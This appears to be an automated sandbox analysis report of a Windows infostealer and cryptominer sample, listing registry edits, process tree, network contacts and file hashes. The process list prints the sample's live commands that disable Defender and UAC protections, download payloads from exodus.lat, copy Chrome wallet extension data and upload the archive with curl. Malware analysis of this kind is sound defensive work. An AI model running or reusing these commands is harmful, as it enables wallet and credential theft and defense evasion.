Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe" C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A

Hijack Execution Flow: Executable Installer File Permissions Weakness

defense_evasion persistence privilege_escalation
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\asm\mi.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\asm\mi.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\asm\mi.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2844 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 3056 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3056 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3056 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 736 wrote to memory of 1812 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 736 wrote to memory of 1812 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 736 wrote to memory of 1812 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3056 wrote to memory of 4628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3056 wrote to memory of 4628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3056 wrote to memory of 4628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Users\Admin\AppData\Local\Temp\smartscreen.exe
PID 2844 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe C:\Users\Admin\AppData\Local\Temp\smartscreen.exe
PID 1724 wrote to memory of 3448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1724 wrote to memory of 3448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1724 wrote to memory of 3448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3056 wrote to memory of 5076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3056 wrote to memory of 5076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3056 wrote to memory of 5076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1724 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1724 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1724 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3000 wrote to memory of 4412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 3000 wrote to memory of 4412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 3000 wrote to memory of 4412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 3056 wrote to memory of 3360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3056 wrote to memory of 3360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3056 wrote to memory of 3360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3000 wrote to memory of 408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3000 wrote to memory of 408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3000 wrote to memory of 408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 408 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 408 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 408 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 3360 wrote to memory of 3196 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe
PID 3360 wrote to memory of 3196 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe
PID 3000 wrote to memory of 2196 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3000 wrote to memory of 2196 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3000 wrote to memory of 2196 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3000 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3000 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3000 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 4424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2848 wrote to memory of 4424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2848 wrote to memory of 4424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 3196 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe C:\Users\Admin\AppData\Local\asm\mi.exe
PID 3196 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe C:\Users\Admin\AppData\Local\asm\mi.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe

"C:\Users\Admin\AppData\Local\Temp\5765545ccc1b99ac6ac37b2d6e2a8cbaf3e30f767b069620a734c3f8022db39c.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"

C:\Windows\SysWOW64\xcopy.exe

xcopy /E /I "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org

C:\Windows\SysWOW64\curl.exe

curl -s https://api.ipify.org

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

C:\Windows\SysWOW64\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

C:\Users\Admin\AppData\Local\asm\mi.exe

"C:\Users\Admin\AppData\Local\asm\mi.exe" --config="C:\Users\Admin\AppData\Local\asm\config.json"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
GB 45.74.38.211:4782 tcp
US 8.8.8.8:53 211.38.74.45.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 exodus.lat udp
NL 203.161.45.11:443 exodus.lat tcp
NL 203.161.45.11:443 exodus.lat tcp
US 8.8.8.8:53 11.45.161.203.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 cdn-downloads.com udp
US 8.8.8.8:53 c.pki.goog udp
NL 203.161.45.11:443 cdn-downloads.com tcp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
NL 203.161.45.11:443 cdn-downloads.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 104.91.71.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 82.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/2844-0-0x0000000074CAE000-0x0000000074CAF000-memory.dmp

memory/2844-1-0x0000000000120000-0x0000000000526000-memory.dmp

memory/2844-2-0x00000000028D0000-0x00000000028DE000-memory.dmp

memory/2844-3-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/2844-4-0x0000000004F20000-0x0000000004F7C000-memory.dmp

memory/2844-5-0x00000000057D0000-0x0000000005D74000-memory.dmp

memory/2844-6-0x00000000052C0000-0x0000000005352000-memory.dmp

memory/2844-7-0x0000000005150000-0x0000000005162000-memory.dmp

memory/2844-8-0x00000000052A0000-0x00000000052A8000-memory.dmp

memory/2844-9-0x0000000005760000-0x0000000005768000-memory.dmp

memory/2844-10-0x0000000005770000-0x000000000577A000-memory.dmp

memory/2844-11-0x0000000005780000-0x0000000005788000-memory.dmp

memory/2844-12-0x00000000057A0000-0x00000000057B8000-memory.dmp

memory/2844-13-0x0000000005ED0000-0x0000000005EE0000-memory.dmp

memory/2844-14-0x0000000006510000-0x0000000006B38000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_34a1bbls.ynl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2844-25-0x0000000006D00000-0x0000000006D36000-memory.dmp

memory/2844-24-0x0000000006CA0000-0x0000000006CBA000-memory.dmp

memory/2844-26-0x0000000007540000-0x0000000007BBA000-memory.dmp

memory/2844-27-0x0000000006F80000-0x0000000007016000-memory.dmp

memory/2844-28-0x0000000006F20000-0x0000000006F42000-memory.dmp

memory/2844-29-0x0000000007090000-0x00000000070F6000-memory.dmp

memory/2844-30-0x0000000007020000-0x000000000703E000-memory.dmp

memory/2844-31-0x0000000007100000-0x000000000714A000-memory.dmp

memory/2844-32-0x0000000007BC0000-0x0000000007F14000-memory.dmp

memory/2844-33-0x0000000007420000-0x0000000007486000-memory.dmp

memory/2844-34-0x00000000074C0000-0x00000000074E2000-memory.dmp

memory/2844-35-0x0000000008520000-0x000000000856C000-memory.dmp

memory/2844-38-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/2844-48-0x0000000009680000-0x000000000969E000-memory.dmp

memory/2844-49-0x00000000096A0000-0x0000000009743000-memory.dmp

memory/2844-50-0x00000000097D0000-0x00000000097DA000-memory.dmp

memory/2844-51-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/2844-52-0x0000000009A80000-0x0000000009A91000-memory.dmp

memory/2844-53-0x0000000009AD0000-0x0000000009ADE000-memory.dmp

memory/2844-54-0x0000000009AE0000-0x0000000009AF4000-memory.dmp

memory/2844-55-0x0000000009B20000-0x0000000009B3A000-memory.dmp

memory/2844-56-0x0000000009B40000-0x0000000009B48000-memory.dmp

memory/2980-57-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/2980-58-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/2980-69-0x0000000070610000-0x000000007065C000-memory.dmp

memory/2980-68-0x0000000006C30000-0x0000000006C62000-memory.dmp

memory/2980-79-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/2980-81-0x0000000006E70000-0x0000000006F13000-memory.dmp

memory/2980-80-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/2844-82-0x0000000074CAE000-0x0000000074CAF000-memory.dmp

memory/2980-83-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/2844-85-0x00000000086D0000-0x00000000086E2000-memory.dmp

memory/2844-84-0x0000000009B10000-0x000000000A128000-memory.dmp

memory/2844-86-0x0000000008730000-0x000000000876C000-memory.dmp

memory/2980-87-0x00000000071A0000-0x00000000071B1000-memory.dmp

memory/2980-88-0x00000000071E0000-0x00000000071F4000-memory.dmp

memory/2844-89-0x00000000088A0000-0x00000000089AA000-memory.dmp

memory/2844-90-0x0000000008B80000-0x0000000008D42000-memory.dmp

memory/2844-91-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/2980-95-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/2844-97-0x0000000008B30000-0x0000000008B3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\download.bat

MD5 f2a75175c8082ccd3e1713b00556a6e2
SHA1 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5634c6b6d376093db8be8fc0fffcb578
SHA1 0f88db2d2b257c9f57bf1623af58539505378589
SHA256 751657b98db0de40e7deb48406de29cff429e51af33cac2103d12c9c28f9061b
SHA512 5068e3ec66a54759f68eb85e1ff6f7e7ec719017cb9aa6ff2f8e8c965ce3c2c9f73dc043d084dd871d698f671a6eb6d88d13610cd51e1fce50b8997e441e0d03

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

MD5 1fed66d1f6b85bda20fe0403ca01c9bd
SHA1 6a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA512 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

memory/1472-125-0x000001FA913E0000-0x000001FA9140E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\runsteal.bat

MD5 744f8978db36b4b9db7cb6e5c8c41e08
SHA1 84321921f622d20a4d40c9bef43b7744e74aaee7
SHA256 cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512 d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

memory/4628-136-0x0000000070610000-0x000000007065C000-memory.dmp

memory/4628-146-0x00000000070F0000-0x0000000007193000-memory.dmp

memory/4628-147-0x0000000007380000-0x0000000007391000-memory.dmp

memory/2844-148-0x0000000074CA0000-0x0000000075450000-memory.dmp

memory/4628-149-0x00000000073C0000-0x00000000073D4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 55edeed315bd5ffc7e9b778b2ab646ac
SHA1 fb0211a11f97ad37d034777d9086dd9c3ec7d3bf
SHA256 a11fa5e81fafd4440a5ef8f6a05cd160674899bc3ecbcdf3798344ff1a086bdf
SHA512 4a9cccf5b0469b57a7a454f0a5abb6a14b328e0ab9b720971a681022d7793648a294c65cf3a370d25c661ffd322a8c6808b97a21d603188953f7e076f50457b6

memory/2844-161-0x0000000074CA0000-0x0000000075450000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat

MD5 6e3686fbda5d6de04cbb6a96de1619e6
SHA1 3d45b2cd2eb875a70c5478fe01ab5c892f4b2373
SHA256 f3d0087ff367459be58237633e454401ddafd90a9ecaa8986ab5ab058091df09
SHA512 118d22cf433ad3c19ebff9400d09140a25a9bc2c36fdd6de231c2f2398e53ebc043de5355c071a63d7dc5917a39061ea71e60c314838e25e8f5a8f5f3f9225b9

